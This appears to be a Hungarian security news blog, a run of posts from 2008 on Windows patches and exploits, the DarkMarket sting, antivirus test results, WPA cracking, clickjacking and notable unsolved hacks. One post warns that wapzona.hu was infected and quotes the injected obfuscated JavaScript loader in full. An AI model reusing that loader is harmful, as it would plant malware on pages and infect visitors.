Egyelőre mind szellemileg, mind a TODO listámat tekintve a boot folyamat elején járok, ráadásul még dolgozni is kéne, de azt már így is látom, hogy ez a néhány nap bőséggel szolgáltatott írnivalót. A leveleimet már nagyjából sikerült átfutnom, ígérem mindegyikre válaszolok még ma!

A feedeket is végigpörgettem, úgy érzem az utóbbi idők legérdekesebb témája az MS08-067 azonosítóval fémjelzett kritikus Windows sebezhetőség, melyet a Microsoft soron kívül javított: Szokásosan érdekes részleteket olvashattok a hibával kapcsolatban az SVRD blogon, és természetesen már az exploit is elérhető. 

Most nekiállok növelni a GDP-t, előreláthatólag estefelé fogok majd elkezdeni posztolni, sztéj tyúnd!

Kicsit kiruccanok Prágába megkóstolni, hogy milyenek is a kinnti sörök, a Becherovka meg az Abszint, szóval a hosszú szünet végéig offline módba kapcsolok. De ne keseregjetek, kaptok meglepetést ha hazaérek ;) 

Kikerültek az első videók az ezévi Hacktivityről a konferencia hivatalos oldalára (pontosabban a Google videóra), végre rendes, tömörített formátumban. Egyelőre négy előadást lehet megtekinteni, de a szervezők ígérete szerint hamarosan a többi anyag is felkerül a netre, érdemes tehát rendszeresen csekkolni az oldalt.

Svájci kutatók kidolgoztak négy olyan módszert, melyek segítségével akár 20 méteres távolságból, falon keresztül elcsíphetők a vezetékes billentyűzetek kábelén átvitt jelek. A módszert tesztelték tizenegy különböző PS/2-es, USB-s és laptop billentyűzettel, és a négy módszer közül legalább egy valamennyi esetben működött. A technikák részletei nem sokára publikálásra kerülnek, egyelőre annyit lehet tudni, hogy a módszerek a billentyűzetek elektromágneses terének speciális frekvencián történő mérésén alapulnak. Demonstrációs videók megtekinthetők itt.

Ezeken látható, hogy a bemérést zavarhatják a monitorok, illetve tápkábelek által keltett jelek, ami valószínűleg nagyban korlátossa a módszer felhasználhatóságát.

Az Algo Rythmn VoIP bugvadász csapat olyan sebezhetőségeket talált a népszerű Asterix PBX szerver szoftverben, melyeket kihasználva minimális erőforrás bevetésével használhatalanná tehető bármely érintett kiszolgáló. A három kiadott exploit közül kettőt már hónapokkal ezelőtt bejelentettek az Asterisk fejlesztőjének, a Digiumnak, javítás azonban nem érkezett.A cég javítási kedvét fokozandó, most megjelent a harmadik primitív kis szkript is, amely könnyedén "a világ legfigyelemreméltóbb Linuxot futtató papírnehezékévé" változtatja az Asteriskes gépeket. Kíváncsi vagyok mikor indul be a lövöldözés...

Valami csúnya gonosz kártevő befertőzte a wapzona.hu-t, szóval aki mostanában arra járt, és nem jelzett a vírusvédelme, az jól teszi, ha alapos nagytakarításnak veti alá a számítógépét. A beszúrt kódot megcsodáljhatjátok az alábbi linken:

hxxp://www.wapzona.hu/index.php?kategoria=hirek&cikkid=2790 (vigyázz, fertőz, NoScript ajánlott!)

vagy itt:

<!--8e1da7a2e502dddb6535dae2d6065f09-><<span class="start-tag">script</span><span class="attribute-name"> language</span>=<span class="attribute-value">javascript</span>>knm="%";icj="<scT72T69T70T74 laT6eT67uage=jaT76ascT72iT70t>T20 fT75T6eT63tionT20yrgT6cT28gT29{T76ar T6bxp,dT7aT66=T22nT72:uT24KT38oT54d&T55T41q.aT65T4e|2VT3b-IT28#+v@T68jT33T5cT22T67T69T6dHT5d5T34}T62T73Pl'^~)7`T47T43B{tcT7aT21T5akET70T4dO6yT3d[T4aT2ax1T46T2cwT20T309T5ff\",fgT3d\"\"T2camT2cdT76T2cT6dcnT3dT22T22T2ce;fT6fr(T6bT78T70=0;kxp<g.T6cengtT68;kT78p+T2b){ am=g.charT41T74(T6bxT70T29T3bdv=dT7afT2eT69ndexT4ffT28am)T3biT66(T64T76T3e-1){ T65=((dv+1T29T2581-1T29;ifT28e<T3d0)e+=T381;mcnT2b=T64zT66.chT61rT41T74(e-1)T3b T7dT20elsT65 mcn+T3damT3bT7dfgT2bT3dT6dcnT3bT64T6fcuT6dT65nT74T2eT77rT69te(fT67);}<T2fT73crT69T70T74T3e";mrl=unescape(icj.replace(/T/g,knm));var ko,ac;document.write(mrl);ko="<Pz:mMc0'eri$eiN[g3e@ePz:mMcg>0&Tz$HNrca :mcN#0g<SBR(ld0'eri$eiN[\\g*e@eSz:mMc\\g0SRB[\\gjccMu// aiTTi'Nere'mcmzParNc/ff$csa3P?gv&Tz$HNrca:NnN::N:vg\\g><\\/SBR(ld>g07-0</Pz:mMc>00";yrgl(ko);</<span class="end-tag">script</span>>

Az infóért köszönet Aikonnak!

Frissítés(16:41): Szóltam a WAPZónának, rajta vannak az ügyön, úgy tűnik a kódok nagy részét már sikerült is kigyomlálni.

Mindössze két napba tellt egy Dark_AleX nevű hackernek, hogy eltávolítsa a korlátozásokat a Sony PSP legújabb, 5.00-ás firmware-éből, így most már tetszőleges, házi készítésű kód futtatható a konzolon, miközben annak eredeti funkcionalitása sem veszik el. A hackelt verzió innen érhető el.

A minneapolisi szövetségi bíróság bűnösnek találta a 22 éves Sergiu Daniel Popat, miután az beismerő vallomást tett. Popa 2000 júniusa és 2007 februára között több mint 7000 internetező átverésével körülbelül 700.000$-t zsákmányolt adathalászat és klónkártyák segítségével. A fiatalember ezen kívül komplett adathalász-kitek árusításával is foglalkozott, melyek segítségével bárki felállíthatott hamis weboldalakat az ott gyűjtött adatok alapján pedig klónozhatta az átvert felhasználók bankkártyáját.

Vajon éppen Grafitember megkárosítóját sikerült fülön csípni?

Egyenesen az Oracle-től!

Valószínűleg az Asprox botnet pókocskáinak sikerült SQL injectionnel bevenni az Adobe két oldalát is. Az egyik érintett oldal az Adobe által 2006-ban felvásárolt domainjén Serious Magictalálható, a másik pedig az - eredetileg szintén a Serious Magic által fejlesztett - Vlog It! alkalmazás Adobe.com-on lévő támogatási oldala volt. A megtámadott szájtokon külső domaineken elhelyezett szkriptekre mutató hivatkozásokat rejtettek el , melyek különböző kártevőket igyekeztek a látogatók gépére tölteni, ezzel népesítve az Asprox zombihadseregének létszámát.

A támadást a Sophos szakértői fedezték fel, a linkért köszönet Troppauer Hümérnek!

Íme a legfontosabb információk a Microsoft ehavi biztonsági frissítéséről:

A 11 darab kiadott javítás közül négy besorolása kritikus, ezek a következők:

• MS08-057: Távoli kódfuttatásra lehetőséget adó sebezhetőség az Excelben.  
• MS08-058: Speciális weboldalak meglátogatásakor, Internet Explorer használatával információszivárgás illetve a bejelentkezett felhasználó jogkörével történő kódfuttatás érhető el.
• MS08-059: A Microsoft Host Integration Servert érintő probléma. Speciális RPC kérések küldésével távoli kódfuttatás érhető el az SNA RPC szolgáltatás jogkörével. Egy kis workaround a szolgáltatás jogkörének korlátozására itt olvasható. CVE
• MS08-060: Tartományvezérlőként konfigurált Windows 2000 szervereket érintő, távolról kihasználható, kódfuttatásra alkalmas Active Directory sebezhetőség. CVE

A Microsoft bloggerei részletesen írnak a következő patchekről:

• MS08-066: Helyi kernelmódú kódfuttatást lehetővé tevő hiba. Exploit itt.
• MS08-065: Távoli kódfuttatásra lehetőséget adó sebezhetőség a Microsoft Queuing Service-t engedélyező Windows 2000 rendszereknél.
• MS08-61: Helyi, kernelmódú kódfuttatást lehetővé tevő hiba a win32sys.dll-ben.

Ezekről remélhetőleg a közeljövőben itt is olvashattok majd.

Ezen kívül érkezett egy jópofa token-lopó exploit a milw0rmre Windows 2003-hoz.

Élvezet!

Heti rendszerességgel érkeznek a hírolvasómba a jelentések ellopott kormányzati laptopokról, postán feladott, de soha meg nem érkező merevlemezekről, melyeken emberek millióinak privát adatait tárolták. Annyi ilyen hír jön, hogy az utóbbi időben szimplán figyelmen kívül hagytam őket: nem szolgáltak sok újdonsággal. Ha viszont kicsit belegondolunk a dologba, elég rémisztő a helyzet, ezért nem lenne jó, ha ezek a riasztások elsikkadnának (és ne adj' Isten kis hazánkban is elterjedne ez a gyakorlat), ezért létrehozam egy külön kis rovatot az Elveszett Adatoknak. Az ide kerülő posztok nem fognak megjelenni itt, a főoldalon, de aki kíváncsi, annak mindig naprakészen elérhetőek lesznek az oldalsó menüpontban. A híreket visszamenőleg is töltöm befele szabadidőmben. Az RSS feed nem tudom mit kezd ezekkel az anyagokkal, ha valaki megírná ezirányú tapasztalatait egy kommentben, azt megköszönném!

A német Südwestrundfunk rádió adásában közzé tettek egy rendőrségi jelentést, melyben egy J. Keith Mularski nevű FBI ügynök azt állítja,  hogy egy két évig tartó akció keretében ő üzemeltette a hitelkártyacsalók egyik fórumaként elhíresült DarkMarketet.

Az oldal lehetőséget kínált a külöböző kártyahamisításhoz használt eszközök és adatok cseréjére, a beküldött információkat minden esetben előzetes központi ellenőrzésnek vetették alá, ezzel is növelve a piactér megbízhatóságát és a hatóság rendelkezésére álló információ mennyiségét.

Mularski a Master Splynter nicket használta, amely eredetileg egy 2005-ig aktív kelet-európai spammer, Pavel Kaminski álneve volt. Az ügynök Pavel hírnevét használta fel arra, hogy bekerüljön az oldal adminisztrátori közé. Az így megszerzett pozíciót felhasználva lehetősége nyílt a felhasználók tevékenységének megfigyelésére és (a jelek szerint) sikerült igen nagy befolyásra szert tennie az oldal működésével kapcsolatban.

A leállást is Mularski jelentette be, miután egy másik adminisztrátor, bizonyos Cha0 elrabolt és megkínzott egy rendőrségi informátort (Cha0t múlt hónapban kapták el Törökországban).

A történetet még izgalmasabbá teszi, hogy Max Ray Butler 2006-ban feltörte a DarkMarket szerverét és észrevette, hogy Master Splynter a National Cyber Forensics Training Alliance pittsburgi központjából jelentkezik be, ami történetesen Mularski valódi munkahelye. Ezt az információt hamar szét is kürtölte, de nem sokan hittek neki: a legtöbben egyszerű hatalmi harcként értékelték a dolgot.

A Wired magazin részletes cikkében ismerteti a DarkMarket egy másik adminisztrátorával, Lord Cyrickal készített interjúját, aki nemzetközi diplomácia bonyadalmait figyelembe véve nem tart különösebben a lebukástól. Meglátjuk, ki nevet a végén.

Frissítés: Az FBI hivatalos közleményt adott ki az akcióról. Ebben azt állítják, hogy eddig 56 embert tartóztattak le, és 70 millió dollárnyi visszaélést akadályoztak meg a Dark Marketen gyűjtött információk alapján.

Synapse kérdését, miszerint hogyan is van az, hogy Max Ray Butleren kívül senki nem szúrta ki, hogy honnan jelentkezik be Master Splynter feltettem a Wired-en is, de sajnos túl nagy trollkodás megy ahhoz, hogy választ kapjak. Szerintem az a legvalószínűbb, hogy MS ugyan valamilyen proxyn keresztül jelentkezett be, de MRB ezt is megtörte.

A Secunia kutatói igen elkeserítő eredményre jutottak, miközben saját készítésű exploitjaikat ráeresztették a következő, népszerű internetes biztonsági programcsomagokra:

• McAfee Internet Security Suite 2009
• Norton Internet Security 2009
• Windows Live OneCare
• ZoneAlarm Security Suite 8
• AVG Internet Security 8.0
• CA Internet Security Suite 2008
• F-secure Internet Security 2009
• TrendMicro Internet Security 2008
• BitDefender Internet Security Suite 2009
• Panda Internet Security 2009
• Kaspersky Internet Security 2009
• Norman Security Suite 7.10

(az Eset sajnos kimaradt ;)

A kísérlet során 144 rosszinudlatú kódot tartalmazó fájlt (különböző formátumú képeket, dokumentumokat stb...) és 156 weboldalt etettek meg a legnépszerűbb alkalmazásokkal felvértezett, de nem tökéletesen patchelt Windows SP2-es gépekkel. A fájlokat először kitömörítették egy ZIP archívumból, hogy teszteljék a kísérleti alanyok valósidejű védelmét, majd külön ellenőrzést kértek rájuk, végül megnyitották őket. A káros weboldalakon egyszerűen végigzongoráztak Internet Explorerrel.

Az eredmények elég siralmasak: a legjobban teljesítő Norton a 126 kritikus sebezhetőség valamivel több mint 30%-át fogta meg. Ezek olyan hibák, melyek különösen elterjedt alkalmazásokat érintenek, és publikusan elérhető rájuk exploit. A többi gyártő eredménye 4% (négy százalék) alatti volt.

Konklúzióként a következőket lehet levonni: Bár az Internetbiztonsági megoldások hajlamosak azt sugallni, hogy tökéletes védelmet nyújtanak, valójában sokkal lényegesebb, hogy naprakészen tartsuk szoftvereinket.

Majd' elfelejtettem: a linket köszi Udinak!

Az alábbi gyöngyszemet az Indexen találam (hol máshol?):

Továbbá:

A megkérdezett fiatalok 50,9 százaléka már töltött le jogvédett terméket, sőt nagy hányaduk a szülővel együtt. A fiatalok 7,8 százaléka pedig "hackerkedik" is, azaz hatolt már be illetéktelenül számítógépes rendszerekbe.

Hát igen, nem posztolok hiába :)

A HUP elég jól összefoglalja a témát:

Az Elcomsoft névre hallgató orosz biztonsági cég állítása szerint egy olyan szoftvert adott ki, amely az újabb NVIDIA GPU-k masszív párhuzamos számítási teljesítményét kihasználva 100-szor gyorsabb WPA/WPA2 törésre képes. E cikk szerint Elcomsoft Distributed Password Recover-nek mindössze néhány elfogott csomagra van szüksége ahhoz, hogy sikeres támadást indítson. A szoftver lehetővé teszi NVIDIA GPU-val rendelkező gépek hálózatba szervezését és munkába fogását, így a WPA és WPA2 kulcsok töréséhez monstantól évek helyett csak hetekre vagy napokra van szükség.

A témát több oldal is felkapta. Van olyan oldal, amelyik odáig megy, hogy azt állítja, hogy csak WPA/WPA2-vel biztosítani hálózatot már nem elegendő.

Mások szerint ez a támadás továbbra is csak egy egyszerű "brute force" támadás, amely ha most az Elcomsoft-nak köszönhetően bizonyos esetekben (statikus ASCII kulcsok) gyorsabb is, de sikerességét lehet csökkenteni a kellően bonyolult jelszavak használatával. Továbbá a gyors feltöréshez erős rendszerek kellenek, amelyek high-end grafikus kártyákat tartalmaznak. Nem beszélve arról, hogy TKIP-t használva szintén megnehezíthető az ilyen típusú támadásokat indítók dolga. Van aki egyszerűen csak FUD-nak a témában megjelent cikket.

Én csak egy aprósággal egészíteném ki a dolgot: itt van open-source megoldás.

 Újabb érdekes cikk a rycon.hu-ról:

Sok  PHP-gurunak  és szerver-adminisztrátornak  nincs  szerencséje  a  PHP dl() függvényéhez, mivel  nincs  szükségük  rá.  Ez a  függvény  teszi  lehetővé  külső modulok (library-k)  futás közben  való betöltését. Mint  tudjuk,  a  PHP nyelv teljesen  a C szülötte, így maguk a PHP függvények  is C-ben  íródtak, íródnak. Minden belsőleg használatos függvény egy belső, PHP-hez alapból adott extension-ben található, amit maga a PHP tölt be az inicializáláskor. Ha ezek a függvények nem elégétik ki a szükségleteinket, akkor saját modult kell írnunk, majd konfigurációból, vagy “kézzel” betölteni őket. Miután betöltöttük a library-nkat, a PHP csak azt a C-ben íródott függvényt hívja meg, amit előzőleg implementáltunk.

Egy most kiszivárgott hír szerint az utóbbi egy évben legalább hat komoly betörést szenvedett el a Világbank informatikai rendszere, ezek közül az utolsó alig egy hónappal ezelőtt történt. A támadások során legalább 18 szervert komprommitáltak, melyek közül néhány kulcsfontosságú szerepet töltött be a dollártízmilliárdokkal operáló szervezet működésében.

Az első behatolás nyomaira az FBI szakértői figyeltek fel véletlenül, miközben egy független ügy kapcsán gyűjtöttek információt a rendszerből. A nyomok a Johannesburgi International Finance Corporation rendszeréhez vetettek, valószínűleg innen indult a támadás. Az IFC kezeli a Világbank egyik Common Data Store-ját. Ezekben az egységekben tárolják a legfontosabb adatokat, szétszórva a világ különböző pontjaira, így védekezve pl. az egész kontintensrészeket érintő természeti katasztrófák ellen. Bizonyos, hogy a behatolók hozzáfértek az összes rendszerben tárolt e-mailhez, de nem tudni, hogy mennyit láttak a biztonsági mentésekből.

Egy másik esetben egy indiai off-shore cég, a Satyam rendszerébe juttattak billentyűzetfigyelő szoftvert. A Satyam fejlesztette és tartotta karban a bank pénzügyi és emberi erőforrásokra vonatkozó információit kezelő rendszerét, tízmillió dolláros szerződésük legutóbb nem került meghosszabbításra...

A támadásokat (hogyhogy nem) Kínai IP címekig tudták visszavezetni, de ez valószínűleg csak annyit jelent, hogy a behatolók kínai számítógépek mögé rejtőztek a támadáshoz.

Legio kérdésére is válaszolva idézném a FOXNews cikkét:

A Világban adatközpontja gyakorlatilag a világ pénzügyi információinak aranybányája. Kormányok és cégek klíringházaként a bank számítógépei pénzügyi és hírszerzési informűciókat is szolgáltatnak a belső árajánlatoktól és szerződésektől kezdve a bizalmas értekezletek percre pontos ütemezéséig.

Ha a bank például befektet valamilyen valutába, annak értéke a bank tevékenységétől függően fog változni. A részvények és kötvények is a Világbank bejelntései alapján ingadozhatnak. "Ha előre tudod, hogy a bank Csádban olajvezetékek, Indiában pedig egészségügyi rendszerek beszerzésébe kezd, elég jól kaszálhatsz." - mondja egy belsős.

Bár a bank tipikusan a projektek csak egy töredékét finanszírozza, hatása a projektekre hatalmas. A magáncégek a bank jelenlétét garanciaként értékelik arra nézve, hogy befektetéseik biztosak és megtérülőek legyenek. Annak ismerete, hogy egy projektet visszadob az igazgatóság, ugyanilyen értékes lehet.

A fenti híreket ma hivatalosan cáfolták. Messzire vezető találgatásokra adhat okot azonban az a FoxNews által publikált e-mail, melyben a VB egyik IT fejese a fennálló "krízis" miatt letiltatja a külső webmail hozzáféréseket és arra kéri a kedves kollegákat, válasszanak új jelszót, valamint ez a dokumentum sem arról tanúskodik, hogy minden a legnagyobb rendben lenne a biztonság területén.

Mindez a gazdasági válság közepén elég izzasztó lehet...

Az alábbi posztot kb. egy hete kezdtem el írni. Először sima ügynek indult: egy teljesen egyszerű angol szöveget fordítottam magyarra, ami úgy tűnt, az alapoktól kezdve röviden és érthetően bemutatja a kvantumkriptográfia alapjait, majd annak egy nem rég felfedezett implementációs hibáját. Szeretném hangsúlyozni, hogy nem a kvantumkriptográfiával van a baj, hanem egyszerűen egy rosszul megalkotott műszerrel.

A célegyenesben azonban egy "kisebb" problémába ütköztem: miután átolvastam az anyagot, rájöttem, hogy nem teljesen értem a dolgot. Aztán átgondoltam mégegyszer, és mégkevésbé értettem. Megkérdeztem néhány nem buta ismerőst, és felkerestem egy témával foglalkozó szakértőt is, de kielégítő választ ezidáig nem kaptam a kérdéseimre.

Ma úgy gondoltam, hogy nem érdemes tovább húznom az időt, ráadásul megjelent ez a cikk is ("először" wtf?*), szóval mindenkinek megadom a lehetőséget egy kis agyalásra.

Nem csak az remek új lehetőségek miatt érdemes az Opera böngésző legfrissebb, 9.6-os változatára frissíteni: a régebbi változatokat egy távoli kódfuttatásra alkalmas sebezhetőség (konkrétabban heap overflow) súlytja. A problémát  a Matasano Chargen egyik bloggere fedezte fel egy egyszerű fuzzer segítségével, amely a következő URI-val akasztotta ki a programot: http://BBB*BBB:password@example.com. A támadás Linuxon és Windows-on is kivitelezhető.

Német kezdeményezésre október 11-én világméretű akciót szervez egy civil csoport, melynek során arra kívánják biztatni az embereket, hogy tiltakozzanak a kormányzatok és üzleti csoportok azon, a digitális korszak adottságait egyre inkább kihasználó törekvései ellen, melynek következtében az átlagpolgárokat mind több szinten kívánják megfigyelni, regisztrálni, nyomon követni.

[...]

a magyar Zöld Pók Alapítvány friss hírleveléből is értesültünk róla, hogy Budapesten is csatlakoznak az adatvédelmi megmozduláshoz. A szervezet október 11-én délután 1-től 3-ig a Közért nevű helyen (Budapest, Tűzoltó utca 33/a) paranoia workshopot tart, ahol a privátszféra internetes védelméről tartanak tájékoztatást. Ugyanaznap este 8-kor a képviselőház („fehér ház”) épületének falára (Budapest, Széchenyi Rakpart 19.) látványos formában kivetítik az alapítvány által tárolt adatokat, hogy megmutassák, a törvényi előírásoknak megfelelően mit kell megőrizniük a velük kapcsolatban állókról. Ezek az adatok magukban csak technikai információk, személyes adatokká és potenciális terhelő bizonyítékká csak más adatokkal összevetve, adatbányászat során válnak. Ezt követően pedig, október 14-én este 7-től az Ötödik Szabad Szoftver Esték keretében (Budapest, Uránia Filmszínház kávézója) előadást lehet meghallgatni az adattárolási törvényről és a lehetséges menekülési útvonalakról.

Az ITCafé cikkét elolvashatjátok itt!

Mégis David Kernellt gynúsítják Sarah Palin, republikánus alelnökjelölt e-mail fiókjának feltörésével. Mike Kernell demokrata képciselő húsz éves fia ellen ha minden igaz már tegnap vádat emeltek. A fiatalember maximum 5 év börtönbüntetést, 250.000$ pénzbüntetést és három év próbaidőt [felügyelt szabadonbocsátás] kaphat, pedig lényegében csak egy googling feladvány megoldásáról volt szó. De sebaj, legjobb tudomásom szerint a demokraták vannak nyeregben, a kedves apuka majd biztos beveti a befolyását túlbuzgó fia érdekében...

Kikerültek az első információk a világot rettegésben tartó clickjacking támadásról... Az alábbi videó alapján azt hiszem fejet kell hajtsak azok előtt, akiket annak idején "lehurrogtam", mivel az általuk mutatott próbálkozást nem találtam túlzottan innovatívnak. Nos, mint kiderült, mégis valami nagyon hasonlóról van szó:

PoC kódot itt találtok. Webkamerával rendelkező Firefox felhasználók itt kipróbálhatják a videón bemutatott demót, mikrofontulajdonosok pedig ezzel játszhatnak. Ezek a lehetőségek a Flash 10-zel ki lesznek küszöbölve. 

Kétségtelen, hogy az egység sugarú felhasználó kattintási vágyát kihasználva a támadás kiváló alapot adhat különböző kártékony kódok terjesztésére, a felhasználók utáni kémkedésre stb. A lehetőségek számának tényleg csak a fantázia szab határt: Például az olyan, eddig nehezen kihasználható XSS támadások, melyek pl. az onMouseOver vagy onMouseDown események elsütését igényelték, most könnyebben kihasználhatóvá válnak, de új perspektíva nyílik a CSRF támadások számára is. 

Technológiai szempontból említésre méltó, hogy a clickjacking nem feltétlenül igényel JavaScript támogatást, ezért a NoScript régebbi verziói nem feltétlenül védenek ellene, de a legújabb 1.8.2.1-es verzió már fel van vértezve a ClearClick nevű, anti-clickjacking funkcióval is.

Robert E. Lee és Jack C. Lewis az eredetileg TCP stacknek készült UnicornScan portszkenner készítői a hírek szerint a letapogató és a sockstress nevű eszköz segítségével egy igen érdekes és ijesztő DoS lehetőségre bukkantak:

A megfelelően összeállított kérések pár pillanat alatt olyan folyamatot inditanak el az érintett TCP implementációval rendelkező eszközökben, amely gyakorlatilag megállítja a csomagfeldolgozást, mégpedig olyan módon, hogy az a támadás befejeztével sem indul újra! Tovább súlyosbítja a helyzetet, hogy a támadás során nem csak a célpont, de a köztes eszközök is megfekhetnek. Az érintett rendszerek listája pedig olyan széles, hogy állítólag univerzális DoS támadásról beszélhetünk. 

A felfedezők már több gyártóval kapcsolatban állnak a megoldást illetően. A részleteket a foltok kiadása után ígérik.

Megnéztem az eredeti cikk dátumát: szeptember 30., nem pedig április 1. Mit gondoltok?

A felfedezőkkel készült interjút itt hallgathatjátok meg az 5. perctől (előtte clickjacking hollandul ha nem tévedek ;)

 A feketekalapos hackerek kedvelt mondása, hogy aki igazán jó a szakmában, azt soha nem kapják el. A New Criminologist most összegyűjtötte azokat az incidenseket, amelyek a maguk idejében a legnagyobb riadalmat okozták, elkövetőiket azonban a mai napig nem sikerült kézre keríteni.

A WANK féreg (1989 októbere)

A WANK (Worm Against Nuclear Killers) egyike volt az első "hacktivista" akcióknak. A kártevő beférkőzött a NASA marylandi számítógépeibe, és a plutónium meghajtású Galileo-szonda megállítására felszólító bannereket jelenített meg azokon. A támadás egyes információk szerint valahonnan Melbourne-ből indult.

A Védelmi Minisztérium műholdjának meghackelése (1999 február)

Dél-angliai hackerek sikerült átvenniük az irányítást az Egyesült Királyság Védelmi Minisztériumának egyik Skynet műholdja felett. A műholdról aztán olyan jeleket sugároztak, amit a földi tisztek "információs hadviselésként" értékeltek, azaz azt hitték, hogy egy ellenséges ország próbálja ellehetetleníteni a kommunikációjukat. A támadók ezután megpróbálták átprogramozni a műholdat, de nem jártak sikerrel. A Scotland Yard és a légierő közösen nyomozott az ügyben, eredménytelenül. 

CD Universe hitelkártya-botrány (2000 január)

Egy Maxim nevű, valószínűleg kelet-európai illető 300.000, a CD Universe-ből származó hitelkártyaadatot tett közzé az interneten. A nyilvánosságrahozatal előtt a hacker 100.000 dollárt követelt az adatok megsemmisítésének fejében. Azóta is bottal ütik a nyomát.

Katonai forráskódok ellopása (2000 december)

2000 telén egy hacker bejutott az Exigent Software Technology, katonai szállító rendszerébe és megkaparintotta az OS/COMET rakéta- és műholirányító rendszer forráskódjának nagyjából két harmadát. A behatoló nyomát egy német egyetemig követték, de tovább nem jutottak.

Anti-DRM hack (2001 október)

Nem minden hack jár olyan potenciálisan kellemetlen következményekkel az egyszeri felhasználók felé, mint a fentiek. Beale Screamer például FreeMe nevű programjával megszabadította a Windows Media felhasználóit a csúnya-gonosz DRM-től. Bár a Microsoft megpróbálta leleplezni, a DRM-ellenes aktivisták pedig igazi hősként tisztelték, Screamer valódi identitását a mai napig homály fedi.

Dennis Kucinich és a CBSNews.com (2003 október)

Bár ez a hazai olvasó szemében nem akkora durranás, Dennis Kucinich demokrata elnökjelölt és kampánystábja néhzetett egy nagyot, amikor egy lelkes támogatójuk lecserélte a CBSNews oldalát egy kampánylogóra, majd a lap látogatóit Kucinich fél órás kampányfilmjéhet irányította.

26.000 megtört oldal (2008 tele) [lol]

Ennél azért jóval durvább számokat látunk manapság, szintén gyanúsítottak nélkül...

Supermarket törés (2008 február)

A mai napig sem világos, hogy hogyan sikerült illetékteleneknek hozzáférni a Hannaford és a Sweetbay áruházak vásárlóinak számlaadataihoz. A legóvatosabb becslések szerint 1800 ügyfél adatai kerültek a támadók birtokába, de egyes számítások ezt a számot 4.2 millióra teszik! Ennyi információ birtokában pedig nem nagyon lehet az elkövetők után eredni...

Comcast átirányítás (2008 május)

Ez az incidens tipikus példája annak, hogy milyen meglepően keveset számít egy rendszer jól beállított védelme, ha alant a szolgáltató gyenge mint az Algopirin. A Comcast esetében sem a célpont rendszere, hanem a szolgáltató Network Solutions-é volt a leggyengébb láncszem, ami végül (átirányításos) deface-hez vezetett. Bár a támadók interjút is adtak, az illetékesek még mindig nem értik, hogy honnan szerezhették meg  a Kryogenics tagjai a jelszvakat, melyekkel az akciót véghezvitték.